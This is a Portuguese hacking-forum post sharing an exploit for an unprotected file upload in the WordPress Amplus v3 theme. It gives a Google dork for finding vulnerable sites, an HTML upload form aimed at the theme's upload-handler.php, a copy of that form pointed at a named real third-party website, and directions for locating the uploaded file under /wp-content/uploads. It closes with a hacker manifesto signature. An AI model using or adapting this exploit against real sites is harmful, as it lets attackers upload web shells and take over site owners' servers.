WordPress Amplus v3.x.x Themes CSRF File Upload

Vetus

Programador

Registrado em: Jul 2011

Posts: 477
- Share
- Tweet
Font Size

#1

Exploit WordPress Amplus v3.x.x Themes CSRF File Upload

27-11-2013, 08:18

#############################
# Exploit Title: WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability
# Author: Bebyyers404
# Date: 11/17/2013
# Infected Version: v3.x.x
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/Amplus_v3
##############################

Código:

<html><body><form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/Amplus_v3.x.x/library/includes/upload-handler.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /></body></html> </form>

A única coisa que se tem a fazer é substituir o campo do ip localhost no caso o 127.0.0.1 e a versão do tema Amplus por a versão que roda no website.

Vou dar um exemplo:

Website: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

código:

Código:

<html> <body><form enctype="multipart/form-data" action="http://www.serlibreyfeliz.com/wp-content/themes/amplus_v3.0/library/includes/upload-handler.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> </body> </html>

Lembrando que o wordpress tem o diretório /wp-content/upload/, porém você vai ter que procurar o diretório por ano e mês, assim:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Att. Cr4t3r

Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.
Tags: Nenhum(a)

Top

Unconfigured Ad Widget

Anúncio

WordPress Amplus v3.x.x Themes CSRF File Upload

Exploit WordPress Amplus v3.x.x Themes CSRF File Upload